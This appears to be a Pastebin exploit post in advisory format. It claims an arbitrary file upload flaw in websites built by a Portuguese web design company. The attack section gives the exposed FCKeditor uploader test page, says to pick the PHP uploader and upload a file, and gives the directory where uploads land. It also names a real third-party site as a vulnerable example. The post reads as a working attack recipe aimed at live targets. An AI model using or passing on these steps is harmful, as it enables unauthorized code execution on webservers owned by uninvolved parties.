KingSkrupellos

Ctecia ComputerTechnologies Experts Unauthorized File Insert

May 21st, 2019
59
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.12 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Ctecia ComputerTechnologies Experts Unauthorized File Insertion
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 21/05/2019
  7. # Vendor Homepage : ctecia.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
  12. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  13. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  14. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  15.  
  16. ####################################################################
  17.  
  18. # Description About Software :
  19. *****************************
  20. Ctecia ComputerTechnologies Experts is Web Design Company in Portugal.
  21.  
  22. ####################################################################
  23.  
  24. # Impact :
  25. ***********
  26. Ctecia ComputerTechnologies Experts is prone to a vulnerability that lets attackers
  27. upload arbitrary files because it fails to adequately sanitize user-supplied input.
  28.  
  29. An attacker can exploit this vulnerability to upload arbitrary code and execute
  30. it in the context of the webserver process. This may facilitate unauthorized access
  31. or privilege escalation; other attacks are also possible.
  32.  
  33. ####################################################################
  34.  
  35. # Arbitrary File Upload / Unauthorized File Insert Exploit :
  36. **************************************************
  37. /FCKeditor/editor/filemanager/upload/test.html
  38.  
  39. Select the "File Uploader" to use : Choose PHP and upload your file.
  40.  
  41. Directory File Path :
  42. **********************
  43. /FCKeditor_upload/[YOURFILENAME].txt .jpg .gif .png
  44.  
  45. ####################################################################
  46.  
  47. # Example Vulnerable Sites :
  48. ************************
  49. [+] bmgtours.com/FCKeditor/editor/filemanager/upload/test.html
  50.  
  51. ####################################################################
  52.  
  53. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  54.  
  55. ####################################################################
Add Comment
Please, Sign In to add comment